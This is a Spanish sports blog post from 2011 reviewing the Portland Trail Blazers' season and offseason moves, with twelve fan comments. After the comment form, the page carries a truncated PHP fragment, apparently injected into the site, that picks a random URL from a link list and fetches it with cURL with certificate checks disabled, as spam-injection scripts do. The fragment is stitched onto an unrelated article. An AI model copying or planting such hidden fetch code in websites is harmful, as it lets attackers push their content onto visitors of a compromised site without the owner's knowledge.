Portland Trail Blazers: Notable

11 de July de 2011 por Hynreck

Es imposible no sentir cierta simpatía hacia un equipo como los Blazers, el equipo maldito por excelencia. Hace 4 años eran el equipo con el futuro más espléndido de la liga. Contaban con el rookie del año, Brandon Roy, un futuro All-Star como LaMarcus Aldridge, complementos muy válidos como Webster, Frye, Jack o Blake y como colofón, el pívot dominante de la liga para los siguientes 15 años. El resto de la historia es conocida, y no haremos referencia una vez más a las similitudes de la elección de Oden con la del año 1984.

La temporada comenzaba y al poco se conocía que Oden pasaría otra vez por el quirófano y se perdería todo el curso. Los minutos de Roy se veían muy limitados por el estado de sus rodillas y llegaría a perderse hasta 2 meses de competición debido a ello. Przybilla también empezó la temporada lesionado y hasta Marcus Camby se pasaría más de un mes en el dique seco.

Sin embargo el equipo se levantó una y otra vez. Consiguió en febrero a Gerald Wallace, logró colarse en playoffs y nos brindaron una gran eliminatoria contra los a posteriori campeones. La temporada de Aldridge ha sido para enmarcar, así como la gran aportación de Wesley Matthews, Nicolas Batum o Andre Miller. Es un equipo con espíritu, y pese a todo, los aficionados deberían sentirse orgullosos de lo conseguido.

Lo mejor: LaMarcus Aldridge, uno de los PF con más talento de la liga, ha ejercido éste año su nuevo rol de líder del equipo. Hay All-Star para rato. Wesley Matthews vino como jugador de rol pero se encontró con la responsabilidad de ser la amenaza exterior. Su rendimiento estuvo por encima del esperado. El cuarto partido de la serie ante los Mavs. Memorable.

Lo peor: Las lesiones. Otro año más. Como decía Stephen King en “Dreamcatcher” : “SSDD” (same shit, different day). Nos fijamos en lo nuestro: Rudy, su temporada quizás haya sido la peor desde que llegó a la liga.

Jugando a G.M.

– Ya han empezado los movimientos. Tras un gran periplo por N.Y. y un menos exitoso paso por Denver, Raymond Felton hacía las maletas rumbo a Oregon mientras que Andre Miller y Rudy Fernandez abandonaban el equipo. Felton acaba contrato así que se espera una gran temporada por su parte.

– Por otro lado se ejercía la qualifiyng offer sobre Greg Oden por casi 9 millones pudiendo igualar así cualquier oferta que le llegase. ¿Qué hacer? Si llega una oferta superior a 10 millones no le renovaríamos, demasiado dinero para una incógnita que en 4 años sólo ha jugado 80 partidos.

Brandon Roy nunca volverá a ser el mismo, hay que ser realistas. Su salario es inasumible por cualquier equipo y hay que buscarle un sustituto. Pese a la gran temporada de Wesley Matthews, intentaríamos un traspaso con Memphis a cambio del defenestrado O.J. Mayo. Matthews encajaría bien en los Grizzlies y Mayo podría explotar en Porltand tras unos años dubitativos en la liga.

Comenta

12 comentarios a esta entrada

  1. CAMPO2 dice:
    #1

    Ni los veia como equipo de mas proyección hace unos años ni siento simpatia por ellos, me parece una franquicia triste.

      Citar

  2. jas dice:
    #2

    A mi tampoco me caen nada bien y si no recuerdo mal, no es que me cayeran mal antes, xo aora una frase me recorre la mente cada vez que pienso en ellos: Pudrete McMallon!!

      Citar

  3. M dice:
    #3

    Yo también creo que lo peor es Mcmallon xDDD Me caen bien, pero son mucho menos de lo que podrían ser, y no sólo por mala suerte, sino por el encabezonamiento de su entrenador.

      Citar

  4. Txusma dice:
    #4

    Si Rudy no hubiera jugado en Dallas tb caería tan mal McMillan? A lo mejor nos hubiésemos fijado menos.

      Citar

  5. Esteban dice:
    #5

    hay q darle la chance a roy, nadie asumira su contrato si no juega, no sera all.-star, pero si un buen jugador, ademas ya tienen all.stars en el equipo

    si oden por fin vuelve de su lesion, podrian ser campeones el proximo año, todo dependera de oden

      Citar

  6. safd dice:
    #6

    Pensad en una cosa.

    Pensad en un quinteto Andre Miller -Joe Johnson – Gerald Wallace – Aldridge – Howard (no digo que Oden y Roy se hubiesen parecido a JJ y Howard, me refiero al nivel en su posición, q Roy hubiese llegado a ser el 3-4 mejor SG y Oden el mejor center posiblemente)

    ¿Cómo hubiese quedado este año? Este proyecto podía haber sido increible.

    Para mí ahora mismo viendo los proyectos tan interesantes y jovenes como los de Clippers, Memphis, OKC o incluso Sacramento o Minnesotta, Portland seguirá cayendo en primera o segunda ronda, aunque esto no quiere decir q algun año no puedan dar la sorpresa y meterse en la final de la conferencia, pero nada más.
    Oden y Roy no van a dar mas de 25mpp, y a la mitad de nivel de lo q podian haber llegado.

    Espero q tengan suerte, a mi no me caen tan mal (bueno, en realidad esq a mi mal solo me cae Miami, aunq luego tengo preferencias claro)

      Citar

  7. Esteban dice:
    #7

    si quieren ser optimistas, y roy llega a un nivel medianamente similar al que alguna vez tuvo, y oden se acerca a los partidos q puden verse en videos, hablamos de quiza el equipo con mejor potencial de toda la nba, quiza solo atras del thunder en cuanto a proyeccion y del heat solo a mediano plazo

      Citar

  8. CAMPO2 dice:
    #8

    Tan bueno era Oden como para decir que arrasaria la zona por encima de Howard?

      Citar

  9. Viva_Dirk dice:
    #9

    Oden era tan bueno que lo eligieron por encima de Durant después de hacer Kevin 26-11 en su único año universitario. Las condiciones de Oden eran todas y salvo milagro va a quedar en nada.

    En cuanto a Felton, creo que va a notar una ligera diferencia entre D’Antoni y McMillan, pobrecillo.

      Citar

  10. Ru dice:
    #10

    No hay ninguna opción de traerse a Howard a los Blazers,¿Gerald Wallace + Oden por Howard?

    Felton-Matthews-Batum-Aldridge-D.Howard es un quinteto bien majo contando con Roy de maravilloso 6º hombre administrando bien sus minutos,renovando a Superman la temporada que viene,jugando con un 4 excelso de calidad como Aldidge…equipo con muchas posibilidades la verdad.

      Citar

  11. Esteban dice:
    #11

    una pena, q duelo seria oden vs howard,
    quien no conoce a oden mire en youtube sus videos en sus poquitisimos partidos en la NBA y veran que apuntaba a ser mejor que Howard, era un shaq en progreso, un verdadera pena

      Citar

  12. Esteban dice:
    #12

    ru, sinceramente, veo imposible ese traspaso, el mejor pivote de la NBA por uno que en 4 años jugo 82 partidos, y un alero que por su estilo de juego cada año lo golpea mas su fisico sumado a que solo tiene un añloi de contrato, me parece el traspaso mas imposible del mundo

    howard solo llegaria a portland por aldridge y otros jugadores

    creo q el magic aceptaria, habra que ver si a portland le cuaja la ecuacion, sobretodo por que superman sera agente libre a fin de año

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>